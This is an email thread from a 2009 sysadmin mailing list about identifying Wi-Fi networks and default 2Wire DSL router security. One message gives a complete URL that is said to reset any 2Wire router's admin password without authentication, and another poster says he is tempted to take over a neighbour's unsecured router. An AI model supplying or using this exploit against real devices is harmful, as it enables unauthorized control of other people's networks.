> I am pretty sure that this has been fixed in later firmware updates
It is fixed on the one I tried (current FW) but it does get to the admin page Nice to know for older ones though J From: Jeremy Anderson [mailto:[email protected]] Sent: Wednesday, March 18, 2009 12:28 PM To: NT System Admin Issues Subject: 2wire DSL modems Generally the password is the serial number on the bottom of the device and the older ones are easily hacked using "pharming" If you come across a 2Wire DSL router, ANY 2Wire DSL router, if you enter this URL into a web browser (replace 192.168.1.254 with the Router's address), this will reset the password to "admin" http://192.168.1.254/xslt?PAGE=H04_POST&NEXTPAGE=A01&PASSWORD=admin&PASS WORD_CONF=admin <http://192.168.1.254/xslt?PAGE=H04_POST&NEXTPAGE=A01&PASSWORD=admin&PAS SWORD_CONF=admin> I am pretty sure that this has been fixed in later firmware updates, but as a proof of concept this works perfectly. When I was a consultant I often used that link to reset passwords that customers forgot. From: Free, Bob [mailto:[email protected]] Sent: Wednesday, March 18, 2009 11:38 AM To: NT System Admin Issues Subject: RE: Is it possible to pinpoint a WIFI connection 2WIRExxx is the default name of the standard DSL/AP supplied at low or no cost by ATT/SBC. They are all over the place..... Don't be misled into believing that not broadcasting is providing any security whatsoever to any but the most casual by passers. From: Murray Freeman [mailto:[email protected]] Sent: Wednesday, March 18, 2009 11:17 AM To: NT System Admin Issues Subject: RE: Is it possible to pinpoint a WIFI connection In my neighborhood, a couple of my neighbors are using their last name, so that's no problem, but there are 4 that were installed by Geek Squad because they use the name 2WIRE followed by 3 numbers, and there is no duplication. Then there's the idiot who has the name "default", and of course it's unsecured. Finally there's one named FREE PUBLIC WIFI and it too is unsecured, and is not always turned on, so I suspect it's someone trying to steal info! The unsecured "default" is just asking for someone with wifi knowledge to log into his router and change the password and then the settings. I've been tempted, very tempted! None of my neighbors sees me because my radio broadcast is turned off!!! Murray ________________________________ From: Mark A. Ross [mailto:[email protected]] Sent: Wednesday, March 18, 2009 11:45 AM To: NT System Admin Issues Subject: Is it possible to pinpoint a WIFI connection Does anyone know of a piece of hardware or software that will allow you to pinpoint a WIFI connection? In other words, you are in a public location and your laptop detects 5 unsecure WIFI hosts. How do you know which house is using the network name "Bongo" (Couldn't think of a funnier name, sorry). Mark ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~ <http://www.sunbeltsoftware.com/Business/VIPRE-Enterprise/> ~
